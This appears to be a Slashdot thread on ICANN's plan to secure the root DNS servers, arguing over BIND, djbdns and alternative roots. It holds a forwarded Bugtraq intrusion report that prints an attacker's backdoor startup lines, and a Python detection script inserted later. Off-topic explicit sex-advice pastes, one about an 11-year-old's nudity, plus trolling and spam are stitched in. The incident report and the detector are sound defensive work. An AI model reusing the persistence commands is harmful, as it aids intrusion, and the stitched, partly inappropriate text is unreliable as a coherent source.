Securing DNS From The Roots Up
jeffy124 writes: "This article at ComputerWorld tells the story of how ICANN would like to replace the root DNS systems with secured servers. Lars-Johan Liman, one of the root operators, spoke about the concept at ICANN's annual meeting today. He discussed how the world's current redundant DNS system is vulnerable to DDOS attacks and yet-to-be-discovered root holes in bind that can ultimately undermine the entire Internet by taking away the name-IP mappings that are relied upon by just about everyone."
Bind may be vulnerable to security exploits! Sendmail may *not* be as secure as qmail! Walking through Harlem with $100 bills hanging out of your pockets isn't smart! Sky is blue!
Some people just never get the news....
Just deploy Windows 2000 DDNS + Active Directory + Windows 2000 Kerb5 on the internet.
This will weed out all those unix crackers anyway.
The Internet is depending on unsecured servers for DNS? Now how am I going to sleep at night? Next you'll be telling me the earth isn't sitting snugly atop a giant turtle! Is nothing certain any more?
If you can back up the root servers on a "beefy laptop" at a moment's notice, then why the worry about a DDoS? Just set up a "beefy laptop" and drive around from 802.11b to 802.11b and host from many networks! Or not.
I just don't get those fancy things. This site is 64.28.67.150 and that's the way I likes it.
How long till they get bought by Microsoft or AOL and start charging for inclusion?
...then malicious intruders will just go after the core routers, saturate lines, do things of that nature. Not that locking down DNS is a bad thing, but you can't defend everything all the time.
I have yet to find the great reason why everyone uses BIND. I've been working on my own DNS server just for kicks. The protocol itself is trivial. It can be handled so easily, but yet, if you look at BIND's source code, you can't tell what is going on at all. So, why does everyone continue to use it? Or better question, why hasn't someone written a better alternative?
kc8apf
Is there anyone here knowledgeable about this who can comment on a few things?
I'd love to see (more closely) another implementation of the DNS system other than the 3 or so commonly found.
otherwise, someone might actually implement this while it's still useful ....
In other news, the ICANN today approved the use of 'electricity' on the Internet.....
Does it strike anyone else as a bad thing that all of the root nameservers, and for that matter almost all important nameservers, run BIND? Ergo, a serious security bug can be used to take out all of the root nameservers.
We need another DNS server that has the (relative) standard compliance and scalability so that we could have some other server software running on some of the root servers. Unfortunately, all of the alternatives I know of don't scale to that volume of transactions, aren't nearly as proven as BIND, and many of them have standards compliance issues worse than BIND.
...that this overhaul of DNS is sponsored by the RIAA?
"I'm sorry sir, but your website contains copyrighted material -- I trust your users have noted your IP address somewhere?"
:).
Real men surf the net using ip addresses. (And NOT in base 10)
Also OpenNIC is an ICANN-independent root system ... why not just use them instead of ICANN?
Ignore the "p2p is theft" trolls, they're just uninformed
It's important to remember that the DNS servers themselves are patched and secured (I hope) but the issue, as I see it, is that there are only so many DNS servers.
If you could shut down the root DNS server and then work your way down, you could wreak havoc on the whole internet. The net would still work (probably) but you would have to use IPs, not names, and thus the huddled masses would be lost.
I know this is slightly offtopic, but this was there on the bugtraq mailing list, thought ppl here may find it interesting:
To: bugtraq@securityfocus.com
Subject: Fwd: Possible DDOS network being built through ssh1 crc compromised hosts
I am making this notification to assist in determining whether other folks have been affected by this attack.
An associate's home NAT gateway linux box was hacked by what I am guessing was the ssh1 crc bug (ssh1 was the only exposed service). This machine looks to have been compromised on Nov 2nd at 1:15pm PST, I won't know for certain until I obtain his hard disk later today, and provided that /var logging is recoverable. This machine was running redhat 6.2, reasonably patched except for the fact that he was still running ssh1.
It appears that someone may be building up a network of (potentially) DDOS hosts. I have done some quick research and found no matches for the signatures I have been able to identify so far. Using the Chkrootkit (www.chkrootkit.org) utilities did not identify a known trojan pack, so if this isn't identified in the wild, I'm already referring to it as the LIMPninja.
It also appears that this particular host was used as a central host for other LIMPninja zombies. Also, haven't been able to determine what the command structure it is that the remote bots act upon.
The following is by no means complete, even after a full examination of the drive has been completed, as there was never any file integrity base line completed (a shame).
The attack appears to be scripted as all changes happened within a minute, except for the IRC server which was not installed until 2 days later (and manually). When I found this particular irc net there were over 120 hosts all communicating via IRC. This host was found to be running an unrealircd daemon from /usr/bin/bin/u/src/ircd listening at port 6669.
All other compromised hosts were joining this irc network (ircd.hola.mx holad) on channel #kujikiri with a channel key of 'ninehandscutting'. All bots joined as the nick ninjaXXXX where XXXX is some RANDOM? selection of 4 upper case letters.
Several ports were listening:
3879 term (this port had an ipchains rule blocking all external traffic - placed by the attacker's script)
6669 ircd
9706 term
42121 inetd spawned in.telnetd
Logs were wiped, and couldn't find a wiping utility so I'm thinking a simple rm or unlink was used, so I'm hoping to find more details when the disk is in hand. File modifications that were made follow: (not necessarily a complete analysis yet)
Clearly Trojaned binaries (probably others)
/bin/ps
/bin/netstat
/bin/ls (this ls binary was hiding several things, directory structures named /u/, mysqld klogd ...)
/usr/local/bin/sshd1 (the file was just several hundred bytes larger than previously)
Binary file/directory additions
/usr/bin/bin/u/ An entire directory structure containing the ircd server source
/usr/bin/share/mysqld (looks like some type of irc spoofing proxy)
/bin/klogd (almost looks like an ftp proxy)
/bin/term (A bindshell of some sort)
/usr/sbin/init.d was added and is exactly the same file size as term
System configuration files that were modified/added
/etc/hosts.allow made specific allowances for the .dk domain, as well as .cais.net .cais.com
/etc/passwd two new accounts were added with the same password (des hashes - NOT MD5)
/etc/shadow The added accounts were lpd 1212:1212, and admin 0:0
/etc/inetd.conf 200+ lines of whitespace added, and then the single telnet entry
/etc/services was modified for telnet to start on port 42121
/etc/resolv.conf a new nameserver was added...
/etc/psdevtab haven't examined closely yet
/etc/rc.sysinit a line was added to start the /usr/sbin/init.d trojan/backdoor
/etc/rc.local after much whitespace was added.... following lines at the bottom of the rc.local file
killall -9 rpc.statd
killall -9 gdm
killall -9 gpm
killall -9 lpd
term
klogd
"/usr/bin/share/mysqld"
/sbin/ipchains -I input -p tcp -d 0/0 3879 -j DENY
-----
This should assist other ppl who have had similar attacks...
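As an added example (not code from the forwarded Bugtraq report, and not chkrootkit), the following Python script checks a host for the kind of configuration changes that report lists: a second uid 0 account in /etc/passwd, telnet moved to a nonstandard port in /etc/services, and entries pushed out of sight at the bottom of inetd.conf and rc.local behind a long run of blank lines. The file contents below are constructed to mirror the report so the script runs offline; on a real host you would read the four files in and pass their text to scan().

```python
"""Added example: checks for the host changes described in the forwarded
Bugtraq report.  Not code from the report or from chkrootkit; sample file
contents are constructed, not copied from a real system."""
import re

# Constructed sample files shaped like the report's findings.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    + "daemon:x:2:2:daemon:/sbin:/sbin/nologin\n"
    + "lpd:x:1212:1212::/:/bin/sh\n"          # added account, uid 1212
    + "admin:x:0:0::/:/bin/sh\n"              # added account, a second uid 0
)
SAMPLE_SERVICES = "ftp\t\t21/tcp\nssh\t\t22/tcp\ntelnet\t\t42121/tcp\t# moved\n"
SAMPLE_INETD = (
    "ftp\tstream\ttcp\tnowait\troot\t/usr/sbin/tcpd\tin.ftpd\n"
    + "\n" * 200                              # whitespace padding from the report
    + "telnet\tstream\ttcp\tnowait\troot\t/usr/sbin/tcpd\tin.telnetd\n"
)
SAMPLE_RC_LOCAL = (
    "touch /var/lock/subsys/local\n"
    + "   \n" * 150                           # padding made of spaces, not just empty lines
    + "killall -9 rpc.statd\nkillall -9 gdm\nterm\nklogd\n"
    + '"/usr/bin/share/mysqld"\n'
    + "/sbin/ipchains -I input -p tcp -d 0/0 3879 -j DENY\n"
)

EXPECTED_PORTS = {"telnet": 23, "ssh": 22, "ftp": 21}


def extra_uid0_accounts(passwd_text):
    """Usernames other than root whose uid is 0 (a hidden second superuser)."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


def moved_services(services_text, expected=EXPECTED_PORTS):
    """Services whose /etc/services port differs from the well-known one,
    as {name: (port_found, port_expected)}."""
    moved = {}
    for line in services_text.splitlines():
        line = line.split("#", 1)[0].strip()          # drop comments
        m = re.match(r"(\S+)\s+(\d+)/(tcp|udp)", line)
        if m and m.group(1) in expected and int(m.group(2)) != expected[m.group(1)]:
            moved[m.group(1)] = (int(m.group(2)), expected[m.group(1)])
    return moved


def entries_after_padding(text, min_blank_run=50):
    """Non-blank lines that follow a run of at least min_blank_run blank
    (or whitespace-only) lines: the trick that hides an entry below what
    a casual look at the file shows."""
    lines = text.splitlines()
    run = 0
    for i, line in enumerate(lines):
        if line.strip() == "":
            run += 1
            continue
        if run >= min_blank_run:
            return [l for l in lines[i:] if l.strip()]
        run = 0
    return []


def scan(passwd, services, inetd, rc_local):
    """Run all checks over the four file bodies and collect the findings."""
    return {
        "uid0": extra_uid0_accounts(passwd),
        "moved": moved_services(services),
        "inetd_hidden": entries_after_padding(inetd),
        "rc_local_hidden": entries_after_padding(rc_local),
    }


if __name__ == "__main__":
    for key, value in scan(SAMPLE_PASSWD, SAMPLE_SERVICES, SAMPLE_INETD, SAMPLE_RC_LOCAL).items():
        print(key, value)
```

None of this replaces a file-integrity baseline, which the report itself says was missing; it only flags the handful of changes a scripted attack like this one leaves in plain text files, and a trojaned ls or ps on the same box would not stop it reading them.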
...as is the case with register.com (and possibly other registrars), there will always be backdoors into their systems so long as people write code, seeing as how people still make mistakes. See also: putting a $100K firewall in front of a system that you never bother applying ACLs to. It'd be apples and oranges if this all didn't repeat itself so often.
Not so with DNS. While it is a hierarchical system, there are numerous security issues with it. BIND, the software overwhelmingly responsible for the implementation of DNS, has plenty of holes. The machines are also vulnerable to low-tech DOS attacks. So what? Any centralized machine offering a service which consumes bandwidth is vulnerable to DOS attacks. It's a well known issue and there is lots of research on ways to combat it: load balancing, ICMP filtering, etc.
The bottom line is this. Don't be too worried about DNS going down. Unlike www.microsoft.com or www.whitehouse.gov, there is little incentive for a malicious script kiddie to attack DNS.
Of course, if you're really paranoid, start writing down the IP addresses of your favorite sites.
BEN
There are 13 root servers in the world, I believe. Their locations are well known. Yes, they are well secured, but still, if terrorists want to more or less shut down the ENTIRE NET from the point of view of end users, they'd just have to take out the root servers and presto!
Is there any other critical network as vulnerable as the Internet? Telephone, electricity, water, etc... they are all much harder and less vulnerable than the Net in terms of their architecture.
Don't some of the root servers, or at least their datacenters, handle the gTLDs as well (.com, .net, .org, .edu)? That makes matters even worse.
With the Net no longer an academic resource, but mission critical for business today, I'm surprised that only NOW people are starting to find that this COULD be a single point of failure for the Internet.
George W. Bush
President, United States of America
- Sun has a horrendous response time on vulnerabilities in Solaris. One study I read said that the average "exposure time" between an exploit release and a corresponding patch release was about 40-50 days. It's no wonder so many Solaris boxes get cracked, given their relative obscurity.
- Linux has such advanced features as POSIX capabilities, a working chroot() syscall that actually isolates processes, and safe privilege bridging mechanisms. Commercial UNIces have none of these. They allow Linux admins to use a much more fine-grained security model to control potentially rogue processes like BIND.
- Linux (except for SuSE) has far fewer setuid programs. On most UNIX systems, ps, whodo, netstat, xlock, and several other ridiculous programs are either setuid root or setgid kmem. Yes, even on OpenBSD. No wonder they have local root exploits so often.
- Linux has proper restrictions on signal passing. Other UNIces can be tricked into delivering malicious signals through several ioctl calls. (I have a Solaris source code license and I have seen several areas where more checking needs to be done. Sun ignores my complaints.)
Commercial UNIX operating systems do have some scalability advantages over Linux when run on big iron (64+ processor) machines. But when the integrity of the DNS system is at stake, there is no choice other than Linux.~wally
There seem to be some pretty big problems in how the whole DNS system works in the first place; for a system with a fairly high degree of built-in redundancy, I've often found websites where ONE of their DNS servers has gone down, and I can't access the site. The other DNS somehow isn't queried, other caching DNS servers along the chain aren't queried, and it fails. The IP address I'm looking for is, in theory, sitting in a thousand caches all over the net, but it's not fetched? The loss of Microsoft's DNS a few months back is a good (although not particularly worrying) example.
Then again, maybe I don't notice the times it DOES work like it's supposed to.
-"I still believe in revolution; I just don't capitalize it anymore." - srini!
I remember that. That part always makes me laugh until I cry, then I laugh some more.
Yeah, I found a security hole... But all I got out of it was a toy Yoda.
People still run bind as root?!
STREAMS is nothing but a gaping security hole. It practically invites ordinary users to run their own code in kernel space. Until they change the architecture so that non-root users can't just ioctl(I_PUSH) their own r00tkit module into ring 0, these OSs will never have any security to speak of.
Hope this wakes up some people who should be spending more on their DNS.
Hell, of course not. None of the corporate suits reads slashdot do they?
asl
It's not difficult to get a nameserver back up and running, and the volume of data maintained by the root server is nothing in quantity compared to, for instance, .com.
The main problem is that all the second-level servers have fixed pointers (usually hard-coded, I believe, in text files) to the root servers.
Assuming some form of robust authentication could be worked out, this could be a killer app for IP multicast, where, if a root server goes down, once the replacement comes back up, the IP of that server gets instantly disseminated to all secondary level (or maybe even further down) nameservers around the world rather than manual notification (or however it works now), so that downtime would be minimal.
Sound viable?
George W. Bush
President, United States of America
if, by some freak incident, all DNS entries pointed to one (or a very small group of selected) IP? All requests would be directed to a concentrated number of IPs. That's a mass DDoS for ya!
Where on earth did you come up with that .sig?
:-)
ROTFLMAO
Real men's DNS servers are /etc/hosts.
As long as no one opens their mouth about possible security leaks, we'll be safe.
Last post!
Anyone know the IP address of Goatse.cx?
You've been looking at goatse.cx so much that you've gone blind - you sick fuck.
The IP address is there 6 times on the page you linked to.
Thanks, David U.
# Hack the planet, it's important.
Here is a summary of the report that talks about Sun's poor response time to security issues.
Don't get me wrong. It's a great system, it's worked for a very long time, it does its basic job admirably. My single main issues with it are its centralization, and increasing politicization.
I've given this a little thought over the years. There are a few fundamental issues with the centralized DNS system.
I've tried kicking around a few replacement ideas, like a peer-to-peer exchange system carrying certificates that act a little like resource search records.
The FreeNet project actually gives a good model for how to distribute and search for these 'domain certificates'.
I'd like to see a system that you essentially 'anonymously' submit namespace entries to. Conflicts are resolved based on context. If a dozen people want "money.domain", fine. If you try to browse to it without any context, you have to choose which one you want based on other information in the certificates (full name, location, nickname etc) and once you've chosen, that context sticks. URLs would need to be extended to also carry this context, which would probably need to be a cryptographic signature to prevent abuse.
It constantly amazes me that people are willing to pay $50 to 'own' a record in a database. The domain land grab was just stupid... in virtual space, you can always just make more land. As .info proves.
DNS will obviously persist for decades, (simply because of the financial and general mindspace investment in 'dots') but hopefully as only one of a plethora of address resolution systems. Name resolution needs to be a pool, not a tree.
"For as long as the DNS system exists, the Internet will never be free" - Morpheus, while very Drunk
Jeremy Lee | Orinoco
my son recently began sunbathing nude outside and also walks around naked like it's no big deal... should I encourage this or as a mother be concerned that he's exposing himself too much?
when I read that article, I recalled a so-called "success story" of one of those secure linux projects (eg, HP's, NSA's).
Someone was getting hacked via a bind buffer overflow exploit on a routine basis, giving the attacker root access. So he installed one of those secure OS's and set it up such that bind ran under a restricted permission set. He basically made named's policy not to allow permission to launch a shell or open ports (other than the DNS listener ports).
When the script kiddies returned, they would overflow the buffer - but when the instruction to launch a shell came across - bam! Kernel issued a permission denied. The kiddie's script wasn't programmed to handle that, which led to a core drop and total system crash.
Kiddie tries again sometime later and attempts to set up a backdoor. Same problem. Kernel denies the opening of a port, core drops again and crashes the box.
While the admin had to restart the server a few times at the mercy of the kiddie, a few more failed attempts taught the kiddie his lesson. He just plain gave up.
Moral of the story being that while named still had the same buffer-overflow hole, the OS was configured to contain named's permissions once that hole was exploited.
The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
Oh how much the world would be a better place if these technologies were implemented!
My girlfriend has very long, great orgasms. She usually has about three or four right after another. But during her orgasms, she pees. It started out as just a little bit a couple months ago and slowly progressed into more. I wasn't sure at first if that's what it was or not because it had no odor or flavor. I mentioned it to her once before and she took offence, so I didn't bring it up again. Tonight during her orgasm she went a lot, and this time you could smell the urine. I am ok with whatever her body does, it really doesn't bother me, but she thinks herself to be a freak and it really bothers her. Now I'm not sure if it is going to mess with our love life. What can I do to make her think she isn't a freak? Is this something that is common in other women? Is there a way to stop her from peeing? Thank you in advance!
Hi, I am the single father of an 11-year-old son and have a question. Well, when I was a young boy in my teens I was always afraid to be exposed nude in front of my parents. And as a father now, I want my son to feel comfortable around me, and to not have to run away and hide when nude. I would like for him to become comfortable with his sexuality. So my question is, how should I approach this. Should I just not wear any clothes around the house, and hope that he gets the hint that it's okay for him to also? Or should I just leave it to him and let him decipher his own feelings? Any and all comments would be great.
My girlfriend and I are both 24. We met as sophomores in college and had a wonderful relationship all through our college years. During this time our sexual relationship was manual sex and occasionally oral, but we both enjoyed it tremendously. Right after we graduated, we decided to have intercourse, and we have continued to do so. About a year ago, I was sent to Hawaii for a week on business. I was able to take my girlfriend with me. The business portion of the trip was short, and so we spent the rest of the time having fun. This included sex several times a day, in motel rooms and sometimes on secluded beaches. By the end of the week, I was starting to get a little sore, and this disrupted further sexual activity. By the time we got home, I was very sore and my glans looked blistered. I put an antibiotic ointment on, and continued with my daily activities, thinking that this would improve. Over the next week, the skin on my glans peeled. Then gradually, over the next week, the soreness went away, and I began sexual activity again. However, I have never felt the same since. The glans is not nearly as sensitive. I no longer enjoy manual stimulation, and oral sex is not great. Intercourse works, but mainly because of the feeling that my entire penis is engulfed, not because I am feeling much through the glans. I assume that I have had serious nerve damage to the glans. But no doctor seems to take this seriously. They have told me that they can't diagnose the problem, that I should see a psychiatrist, and one even suggested that I should visit a prostitute because I needed more stimulation!
Any ideas as to what would have caused this? My girlfriend suggested that maybe I picked up some sort of bacteria, virus or fungus from having had sex on the beach, and that it got trapped under the foreskin (I am not circumcised). Or, maybe I had some sort of allergy to something in Hawaii.
Of course, whatever it was appears to be gone now, but the lack of sensitivity remains. My girlfriend has never shown any symptoms, and her doctor says she is completely healthy. So, whatever this was does not appear to have been communicable.
I am concerned that I have permanent damage.
This time I will be prepared.
I am downloading as we speak all the DNS records in the planet into my /etc/hosts file so I can be immune to the attacks
I encourage others to do the same.
That's not it, you dumb fuck. Go suck a big donkey nut! That IP address goes to a site called Hick.org
ICANN is only relevant as long as everybody uses their DNS. I don't understand why somebody with some moral authority in the IT world doesn't just set up an alternative. I know there are in fact several alternatives, but these are private companies that nobody has heard about.
So who could do it? The IETF and the ACM come to mind. There are probably a few others.
Note that you don't have to switch all at once, you can still fall back to legacy ICANN domains if the new domain system doesn't find a match.
My "ultimate" domain name scheme would allow anything as a .tld (although you could set up a few with restricted access, perhaps '.trademark' or something like that). That way, for example, IBM could use "buy.ibm", while somebody who doesn't like IBM could use "dontbuy.ibm". There would be no way to purchase all the domains under a .tld.
If you celebrate Xmas, befriend me (538
ICANN would like to replace the root DNS systems with secured servers.
Ok, how long before someone at ICANN suggests that the servers should maintain domain to ip mappings in static files. Something like a file called hosts and that could be stored in /etc. Then, a patent would be granted for "a static internet address to domain name mapping system" and "a static domain name to internet address system"
Sorry, I'm just in a sarcastic mood given the fact that they actually use bind. Does anyone find that a little scary?
I know it's been brought up here on /. before, but there are many people who run their own DNS roots, underground dns if you will. Anyone have any links?
Chaos, Mayhem, and Destruction: Not
Wow!! Do you think NetCraft is lying then?? Or is it just a big conspiracy??
I was wondering, I have had sex a few times now and boy do I enjoy it, but my question is if a girl just asked if she could go down on you you'd probably say yes but I am a guy, and I want to know what it feels like to go down on another guy. I'm pretty sure I'm not gay as guys in general repulse me if I even try to think of them that way but I'd really like to go down on a cock. I don't need the favour back but if a guy asked you, would you let him?
Bill Gates has worked his magic once again. XP is the gateway to the future of computing. The wizards of Redmond have stepped up to the plate and once again and hit a grand slam. Ask yourself could life be any better.
You want security get XP. You want a dynamic Web experience get XP. You want your computer to sing and fly get XP. I have and I can tell you my computer soars like and eagle. I am flying when at the keyboard. Truly, it is better than sex.
By this time next year when old technologies are replaced with .NET, PassPort and HailStorm computing will enter a platinum age. Developers using the latest Microsoft development tools will be creating software wonder after wonder.
Don't listen to the nabobs or negativism or open source reactionaries trying to pawn off a dying operating system (Linux) as cutting edge. If you want security, cutting edge technology step up to the plate and upgrade to XP.
Nuff Said.
Help! I have a small piece of skin in only one area of my penis that connects the head to the little loose skin. I am very worried about this. I've heard it could be regrowth after circumcision. Please help!
yeah, I want to see more gaping assholes........... don't you?
I met this cute girl in one of my classes a few weeks ago, and we have gone out three times, and hung out together some. I am 19 and I think she's either 18 or 19. We get along pretty good, and last night she asked me if I would like to go to a lingerie and swimsuit show. I said sure, and then she said she would come to my room and give me one. Well, there's nothing I'd like better, but what is she likely to expect from me? I've never had anything like this happen to me before. Do you think she expects full sex, including intercourse? Or does she just want me to appreciate her nice body, without doing anything sexy? Or, is there something else that I haven't thought of? I have never had intercourse, and I am afraid I will disappoint her. Maybe she thinks I'm more experienced than I actually am. If she gets naked, I'll probably start shaking. Any thoughts about this? Is there anything I should do to stay calm and think straight? Maybe just call the whole thing off?
a setting to show the LOWEST SCORES FIRST. It would help out all us trolls.
please mod this interesting
You can't do zone transfers using djbdns for one thing. DJB thinks that zone transfers are evil, and has his own method for doing the task (rsync over ssh I believe), but whether they're evil or not is beside the point. Like it or not, zone transfers are a part of the core DNS protocols and any proper successor to BIND must implement them all. Starting a standards war with the IETF is not something I want to have along with a name server I deploy. Let Bernstein write an RFC for publication describing his idiosyncratic methods and get the IETF to ratify it as a core standard if he wants, if he truly thinks his way is the better way. The way he operates reminds me more of the way Microsoft handles standards than anything else.
Besides, djbdns is also deficient in a far more important way (for me and to a lot of people here on Slashdot anyhow, I hope): it's actually proprietary software with a limited license for gratis use. It's not Free Software or even Open Source, not by any reasonable definition of the term. There is no license along with his programs, and absent a license you have NO RIGHT to share, study, or change Bernstein's code!
Give me six lines written by the hand of the most honest man, and I will find something in them with which to hang him.
If anyone ever decides to specify standards, let's have one that could pass commands to the upstream router to block attackers' IP addresses from DDOS packets (which are easy to identify) before they get to the NIC card.
Router software could then have this standard feature to tell it to drop packets if they are coming from an IP address in some "shitlist" that's maintained by the upstream provider. Something like this can go a long way to stop DDOS attacks. Of course, getting the router people like Cisco to come up with something like this might be hard to do, as these companies like to always set their OWN standards, and nobody can agree on anything. (Sigh!)
Yeah, I'm fucking serious, what the hell is going on. Some cow logo bullshit. Goddamnit, can a server somehow recognize if goatse.cx was used to contact it and then display goatse.cx but if the raw IP is used not? WTF??????
When will Bill let me have the dynamic Web experience, security and singing and flying all at the same time though?
Look ma, I'm MULTITASKING!
I guess these must be typos...
http://cr.yp.to/djbdns.html
http://cr.yp.to/djbdns/faq/axfrdns.html#config
http://cr.yp.to/djbdns/axfrdns.html
http://cr.yp.to/djbdns/axfr-get.html
Please... learn to have an *informed* opinion.
check here:
http://cr.yp.to/djbdns/axfrdns.html
this supports outgoing transfers. Incoming are a possible security risk (NO authentication happens in most cases, other than IP address checking, IIRC), making this a prudent decision, IETF or no.
BBK
That's news to me. I always thought Network Solutions or whoever runs the other root name servers had their own proprietary and more robust and scalable DNS software.
Give me six lines written by the hand of the most honest man, and I will find something in them with which to hang him.
Yes, I know the answer is that's the way it's always been done, and it was fine for few thousand university and government hosts, but isn't it time to obsolesce the whole centralized hierarchy of name resolution?
At the very least, name server caches could be peered among ISPs.
At the most extreme, how about devolving name resolution out to the very edges of the net to end users' PCs? Doesn't every PC have a HOSTS file already? Clay Shirky described ICQ as the first program to do an end run around the DNS... what are IM programs besides alternate name resolution systems with messaging features tacked on? (And doesn't that perspective give a frightening new aspect to Hailstorm/My Services/Passport/MSN Messenger?)
So why shouldn't end users be swapping resolution data across with their instant messages? Why shouldn't websites be passing resolution data directly to site visitors who then pass? Especially in the case of weblogs?
Yes, I realize that you don't want ecommerce site lookups hijacked by fraudulent resolution data...so there would be a market for a secure resolution service that would behave just like the DNS with Added Security Flavor.
The best sort of data security is lots of backups.
Certain firewalls are contained and operate from a write-protected floppy disk. Isn't it possible to run a whole DNS machine from a tiny distro contained on a write-protected floppy? This would sidestep encryption issues as well as having that Old Skool appeal that the kids are so into these days :)
It is here. Damn bastards. Goatse.cx was just a redirection to the goat/ subdir of that hick.org cow logo site, TROLL ON, MY IDEA FOR JUST IP'S CAN LIVE DOWN WITH DNS
Hope davidu could find the offsite host he's looking for.
If the HTTP request is for xxx.xxx then it will serve a different site than it will if you request yyy.yyy. Goatse.cx has no soul, nor IP.
click here for troll pix!
geek tragedy
Tune in tomorrow when we revisit the 'Bass-O-Matic' as a method for cloning.
See: Not funny as in "funny ha-ha"...must be over 18 to get the joke.
click here for hot pix of trolls in love!
Note that the root servers serve up the names for the .COM/.NET/.EDU/.ORG/.MIL/ + the new ones like .BIZ/.INFO + the country domains. The largest one of them all, .COM, is served from a different set of servers.
Now if I could only get a copy of the nameserver list for all those .COM's... I could make my own local cache.
For comparison:
$ dig ns .
vs
$ dig ns com.
(apologies to non-BIND users, you don't use 'dig')
Not a complete solution, but it would be enough to keep the net going if DNS went down.
No, Thursday's out. How about never - is never good for you?
Is it my imagination or is ICANN actually working on getting their job done rather than horribly complex politics (more complex than needed to solve the problem), or trademark/legal craziness? There's some background at the page of the ICANN DNS Root committee.
Now, I'm pretty skeptical that a closed source DNS server from Register.com is going to be a big part of the solution, but even that I don't really mind so much. Having a few alternatives is good if for no other reason than helping to keep BIND from stagnating.
The article didn't talk much about DNSsec (or this older page) which has got to be part of the solution (to try to give the 10 second summary, when a client makes a DNS query and gets a response, it is kind of tricky to ensure that the response is really from the correct server, and DNSsec uses crypto to solve this and other problems).
It seems like most serious crackers are in it for the notoriety. If the entire internet was brought down, how would anyone know who pulled off the ultimate crack?
This is something I was just looking at... very interesting, shows what techniques have been used to hijack domains.
I'm a minister!
Work it out...one page of text is 10k.
One page is 80 lines...80 entries.
So if you only did one entry per page (host file protocol), you'd only be using a portion of the page...say 30%.
At 10k per page & 80 lines, that's 12.5k pages per million records.
How many entries do we have to work with as of midnight last night?
10 million records is 125 million pages..is 1.25 billion k which is 1,250 gigabytes....or 850 CD-R's per every 10 million records. Or if we focus and use 30%, it works out to 255 CD-R's for every 10 million records...did I do that right?
Mine is too long..maybe we should get together.
$ ping www.slashdot.org
PING slashdot.org (64.28.67.150): 56 data bytes
That's 64.28.67.150!! Start memorizing now!!!
python -c "x='python -c %sx=%s; print x%%(chr(34),repr(x),chr(34))%s'; print x%(chr(34),repr(x),chr(34))"
The answer is simple, just ask the author of IPF how he did it...
Change the BIND license to make it much more restrictive, then sit back as the OpenBSD developers build their own simpler, better, more stable, and much more secure, replacement.
SSH.
IPF.
BIND?
Slashdot gets worse every day... Pipedot: News for nerds, without the corporate slant
That's because the guy that owns hick.org hosts goatse.cx. Hi, I'm name-based virtual hosting. Get to know me.
This is clearly just a ploy to establish iron-fisted control over the internet. What is more likely to be for the best in the long run is an extensible, completely open holographic DNS schema distributed across each client. That the problem of DNS and the fecundity of PtoP have not been mated seems to me an absurd thing.
This is the difference between hackers and bureaucrats in a nutshell. Centralized control over resilient sophistication. God damn each of those bimbo sellout engineers for their short-sightedness. If I had one ounce of say, one chance at effecting or affecting the logical and liberty enhancing solution I mention above, I could consider my life more or less complete. (And I'm a card carrying member of ICANN at-large, dammit, and so much closer to such a goal than the bulk of you all!!) This is surely going to be the doom of the net as we know it.
How long before the governing body (ICANN) of such a rigid and authoritarian system becomes a mere appendage of one of the big players (IBM, AOL, MSFT)? That ICANN is already rotten with corruption is apparent to almost everyone, but what I am asking is how long before even the lip service is discarded? I am aghast at the thought of a monopoly on basic existence that such moves as this do threaten.
This is a call to arms. Anyone involved with open DNS or PtP should reply to this thread or email me at: this address to discuss superseding such insidious and freedom wrecking evil as presented in the parent story.
Thank you.
get it ? :)
ok, I tried to be funny.
And yes we do use bind at work (and yes I'll look into upgrading again).
New things are always on the horizon
64.28.67.150 is the only IP you need!
This space left intentionally blank.
Reading this article, I have to start wondering if maybe I'm misunderstanding the problem.
The actual root servers are only queried for the top-level domains and while they have rather massive databases, the types of queries they get are limited.
Now, I'm going to assume that given all the money collected for domains, there somewhere exists a nice pot of money available for running root DNS servers. If there isn't then something is seriously wrong with the administration of DNS.
Segmentation of the actual root servers from the world by utilizing a front-end dns cache that would rewrite the actual DNS queries would solve a lot of problems.
First, rewriting queries would allow an amazing amount of sanity checking to be done on the query itself and should prevent exploiting the back-end root servers directly.
Second, as front-end dns caches can be extremely simple and require almost no configuration, the OS installation can be absolutely minimal excluding even shells. You could go as far as to use an OS that allowed you to revoke system privileges such as certain syscalls (fork, exec, open, etc aren't all that necessary once everything is running) and even make the caching DNS server run as init (though you must have something to bring up networking interfaces.)
Physical segmentation is obviously important as well so a private backbone strung between all core root servers and a separate interface on each front end cache to access them would help quite a bit.
Of course then comes the issue of DoS attacks which again should be rather easy to solve considering what we are talking about. Just buy a lot of front-end cache systems. You would think given how important root servers are and how much money domain revenues generate, buying a thousand or even ten thousand machines and sticking them in every major network access point wouldn't be all that big of a deal.
Now you still have to deal with the fact that most DNS servers still have a static list of root server IPs. Thankfully, the simple DNS queries that hit root servers can be done with a single UDP packet request and response (until you have to work up the hierarchy) making them prime targets for one of the many clustering solutions out there from simple IP sharing virtual servers to routing protocol tricks.
Of course, I may be oversimplifying the problem.
The world is neither black nor white nor good nor evil, only many shades of CowboyNeal.
Women drinking a glass of gue: Mmm that's good fish.
That happens to be my favorite saturday night live skit. I miss the old gang of the 70's. Not the crap they have on today.
http://saveie6.com/
The maximum uptime I have got for a Linux box is only four months. Screw uptimes - the only way you get uptimes that big is if you haven't upgraded your system and you're leaving it with gaping holes. All those from your top ten lists have regular holes and updates. Not installing them to retain uptime isn't something to be proud of and it's not a measure of an OS.
Look at it this way, each record needs four bytes for the IP number, one byte to mark the end of the line, and the rest is the second level domain. Each top level domain would have its own file.
So, with 10 million records, and a mean name length of 15 characters, you would need 15+4+1=20 characters per record, or about 200MB. If you compressed the data, it would be a whole lot smaller.
Putting it in /etc/hosts, you would need at most 16 characters for the IP number (trailing space), the domain name, a top level domain name, and \r\n. So you get 16+15+4+2=37, or about 370MB.
Of course, each domain also has meta data, such as IPs for backup name servers, name and address for the contact person, date the registration expires, etc.
Gee, after 10 years of numerous remote-root exploits and a legacy of bloat, bugs, and overall abominable design, they're JUST NOW starting to think that BIND might not be the way to go? Wow.
Because of the size of data that they have to serve and the incredible bloat of BIND, the root name servers are very large machines. Let's say that they chose Dan Bernstein's DJBDNS. The size of the machine would be reduced by at least half, and security would instantly become a non-issue (at least as far as the DNS software is concerned.)
